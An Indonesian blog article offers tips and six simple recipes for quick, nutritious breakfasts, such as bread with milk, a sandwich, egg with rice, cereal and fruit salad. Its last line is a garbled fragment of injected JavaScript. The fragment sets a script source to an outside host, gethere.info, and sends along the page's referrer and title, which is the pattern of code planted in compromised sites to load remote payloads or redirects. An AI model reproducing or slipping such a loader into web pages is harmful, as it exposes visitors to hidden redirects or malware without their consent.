Tips Membuat Sarapan Praktis dan Bergizi

Sarapan di pagi hari dapat diartikan sebagai asupan pertama pada tubuh. tentu saja setelah tidak mendapatkan asupan makanan selama waktu tidur dimalam hari merupakan hal yang penting. bagaimana tidak, karena tubuh kita sangat membutuhkan sumber energi untuk tubuh dan otak kita saat akan memulai aktifitas sehari-hari. jadi harus dibiasakan selalu sarapan pagi yah.

Nah sudah tahu kan manfaat dari sarapan dipagi hari ? jadi jangan jadikan alasan sibuk atau tidak ada waktu untuk tidak makan dipagi hari yah. karena seperti yang kami katakan tadi diatas, kalau sarapan dipagi hari itu sangatlah penting. namun dalam memilih menu untuk sarapan pagi harus diperhatikan juga ya! Nah, sekarang kami akan memberikan tips Membuat Sarapan Praktis dan Bergizi.

Dalam memilih menu hidangan untuk sarapan pagi tidak boleh terlalu kenyang atau memakan makanan yang berat terlalu banyak. karena jika anda mengkonsumsi makanan berat terlalu banyak, yang ada bukannya semangat namun akan menyebabkan ngantuk atau malas. sebenarnya menu sarapan dipagi hari dengan roti tawar dengan segelas susu saja sudah cukup. namun jika kita menikmati roti tawar dengan segelas susu setiap hari tentunya akan merasa bosan juga kan ?

Dan bila anda tidak mau ribet dalam membuat tidak membutuhkan waktu yang lama dan tidak ribet karena anda adalah orang yang setiap hari nya dikejar waktu ataupun sibuk . selain enak dan praktis beberapa menu sarapan pagi yang kami bagikan dibawah ini juga dapat anda nikmati didalam mobil atau sebagai bekal anda dikantor ataupun ke sekolahan.

Selain enak dinikmati, salah satu trik juga untuk si kecil yang diberi bekal ke sekolahan agar tidak jajan sembarangan. si kecil pasti akan menyukai aneka kreasi menu sarapan pagi yang kami bagikan kali ini. karena banyak aneka kreasi yang enak dan praktis yang cocok untuk anda coba membuatnya dirumah. Nah untuk lebih jelas dari bahan- bahan dan cara membuatnya silahkan simak artikel Resep Membuat Menu Sarapan Pagi Praktis Sehat Bergizi seperti dibawah ini.

roti tawar

1. Menu Sarapan Pagi Dengan Roti Tawar, Susu Dan Buah Sehat
Menu sarapan ini dapat anda sajikan untuk menu sarapan anda jika anda tidak sempat untuk memasak pagi atau jika anda bangun kesiangan. anda hanya perlu menyiapkan Roti Tawar yang diolesi dengan aneka selai, seperti selai coklat, selai kacang, selai stawberry atau lain sebagainya. setelah itu siap untuk langsung anda nikmati. kemudian minum susu yang sudah disiapkan, jika ada buah pisang sebagai buahnya karena buah pisang sangat cocok sebagai hidangan penutup makan. jadi cukup lengkap praktis dan sehat bukan ? jadi dengan menu sarapan ini saja, anda sudah dapat segera untuk memulai aktifitas anda.

sandwich
2. Menu Sarapan Pagi Dengan Sandwitch Dan Susu
Menu sarapan kali ini juga tidak jauh beda dengan menu sarapan yang kami bagikan diatas, karena sama-sama menggunakan roti. namun bedanya menu yang satu ini menggunakan roti yang terbuat dari gandum. anda hanya membutuhkan bahan-bahan sebagai berikut ini :

Roti gandum 2 lembar
Telur rebus 1 buah ( diiris-iris )
Bawang bombay ( diiris-iris )
Tomat ( diiris-iris )
Keju 1 lembar
Daun salad 1 lembar
Olive oil secukupnya

Cara Membuat : Pertama-tama panggang roti jika suka , kemudian olesi roti dengan olive oil.
Kemudian ambil satu lembar roti dan alasi dengan daun salad, kemudian susun mulai dari telur, tomat, bawang bombay, keju lalu tutup dengan roti yang satunya.
Selesai, Sandwitch siap dinikmati dengan ditambahkan segelas susu.

nasi-goreng-bungkus-telur-dadar

3. Menu Sarapan pagi Nasi Dan Telur Praktis
Untuk membuat menu sarapan pagi ini tidak terlalu ribet jika sudah ada nasi, tetapi tidak ada waktu untuk memasak. anda dapat menggoreng telur saja sebagai menu sarapan pagi anda. terlebih jika telur digoreng setengah matang nutrisi yang anda dapatkan tentunya akan lebih banyak. jika sudah, anda tinggal minum segelas susu jika ada. setelah itu, anda pun siap untuk memulai aktifitas anda.

sereal
4. Menu Sarapan Pagi Sereal Dan Susu Praktis
Ini adalah salah satu menu sarapan yang paling praktis dan cepat untuk disajikan. untuk membuat atau mempersiapkannya anda tinggal tuang sereal ke mangkuk lalu tinggal tambahkan susu. anda hanya memerluka waktu 5 menit saja untuk menyiapkan menu sarapan ini.

energen
5. Menu Sarapan Dengan Minuman Bernustrisi Praktis Cepat Saji
Untuk saat ini memang begitu banyak sekali minuman bernutrisi dengan aneka rasa yang dijual dipasaran. ini bisa dijadikan pilihan jika anda tidak sempat untuk menikmati sarapan pagi. anda cukup tuang dalam wadah atau gelas lalu seduh dengan air panas, dan minuman menu sarapan pagi anda pun siap untuk dinikmati. namun jangan sampai lupa memilih minuman nutrisi siap saji yang benar-benar bagus dan terpecaya akan kualitasnya yah.

salat
6. Resep Menu Sarapan Pagi Dengan Salad Buah Segar
Jika memang kebetulan anda mempunyai buah-buahan dirumah seperti pisang, apel, pepaya atau nanas, anda dapat membuat salad buah yang segar untuk menu sarapan dipagi hari anda. salad buah yang segar merupakan salah satu menu sarapan pagi yang sehat dan bagus sekali untuk anda yang sedang menjalani program diet. anda tinggal menambahkan dressingnya saja, anda dapat menggunakan perasaan lemon ataupun orange jus yang dapat anda tambahkan garam sedikit untuk penambah rasa. cukup dengan 10 hingga 15 menit saja anda sudah dapat sarapan pagi dengan praktis dan sehat .
Nah itu lah beberapa aneka kreasi Menu sarapan pagi yang dapat menjadi pilihan anda dipagi hari saat akan memulai aktifitas . jadi anda tidak akan khawatir lagi terlambat memulai aktifitas atau bekerja bukan ? nah silahkan mencoba dan berkresi sendiri dengan Resep Membuat Menu Sarapan Pagi Praktis Sehat Bergizi ini dirumah.

@evoucher.co.ids.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;